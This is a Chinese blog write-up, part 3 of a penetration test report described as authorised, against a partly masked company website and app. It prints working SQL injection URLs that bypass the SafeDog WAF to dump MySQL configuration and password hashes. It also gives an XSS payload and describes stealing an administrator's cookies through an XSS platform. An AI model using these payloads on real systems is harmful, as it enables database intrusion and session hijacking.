主页 > 网络知识 > 某企业授权渗透报告(3)

某企业授权渗透报告(3)

https://www.l****************d.cn/about.php?id=-1%27%20/*!14440union*//*!14440select%20*/1,2,group_concat(0x3C68343E42797061737320736563757269747920646F672073716C5F696E6A6563743C68343E,0x3C68723E,0x4D7953514C20506F72743A20202020,@@port,0x3C68723E,0x4D7953514C2076657273696F6E3A,@@version,0x3C68723E,0x4D7953514C5F696E7374616C6C5F706174683A2020,@@basedir,0x3C68723E,0x4D7953514C5F64617461626173655F706174683A20202020,@@datadir,0x3C68723E,0x43757272656E7420646174616261736520757365723A20202020,current_user,0x3C68723E,0x73797374656D2076657273696F6E3A20202020,@@version_compile_os,0x3C68723E,0x686F73746E616D653A20202020,@@hostname,0x3C68723E,0x43757272656E742064617461626173653A20202020,database/*!()*/,0x3C68723E,0x5573657220496E666F3A20202020,user/*!()*/),4,5--%20#

执行结果:

 

image.png

 

(成功绕过安全狗查询出信息)

从上图的sql注入查询返回的结果我们可以看到此站点相关系统配置信息,此站点是Windows server 64位服务器部署,MySQL版本为5.5.19,MySQL数据用户限制仅本地登录,MySQL端口号为3306,当前用户非root用户。

接下来我们进行尝试查询MySQL数据库的用户账户名和密码哈希

payload:

group_concat(user,0x40,host,0x3A3A3A,password,0x3C62723E3C68723E),4,5 from mysql.user -- #(MySQL数据库版本在:5.x.x)

group_concat(user,0x40,host,0x3A3A3A,authentication_string,0x3C62723E3C68723E),4,5 from mysql.user -- #(MySQL数据库版本在:8.0.19上)

这里使用第一条payload,拼接好payload后如下:

https://www.l****************d.cn/about.php?id=-1%27%20/*!14440union*//*!14440select%20*/1,2,group_concat(user,0x40,host,0x3A3A3A,password,0x3C62723E3C68723E),4,5 from mysql.user -- #

执行结果:

 

image.png

(成功绕过安全狗查出Mysql账号&密码哈希)

 

拿密码哈希之后进行解密,拿到目标明文的MySQL数据库登录密码。

 

某企业授权渗透报告

经过多次查表尝试我也没有查出网站后台管理员的账号和密码(我太菜了),也无法远程登录目标数据库。另外两个的网站都是纯静态网站,没有下手思路,只能把目光放到的APP里的域名中。

 

由于X-ray与AWVS联动扫描目标APP资产会因为请求速度过快被会导致被目标环境设置防火墙给直接拦截。

 

某企业授权渗透报告

 

没有钱买代理,只能采取被动扫描手机需要需要在WLAN中设置代理,把流量转发给X-ray。然后手机正常用户点击访问目标APP,Xray就会自动扫描。

Xray-扫描完毕之后查看扫描汇总报告,在报告中发现一处目标系统"用户反馈处"存在疑似XSS跨站脚本漏洞,插入弹窗代码看看是否存在xss漏洞

payload:

<script>+-+-1-+-+alert(1)</script>

 

某企业授权渗透报告

 

 

某企业授权渗透报告

 

插入恶意窃取cookis脚本

 

某企业授权渗透报告

接下里就是耐心耐心等待管理员上线查看用户反馈了,我守株待兔等了两天时间,xss平台成功接受到了目标管理员的cookies信息。

 

说点什么吧
  • 全部评论(0
    还没有评论,快来抢沙发吧!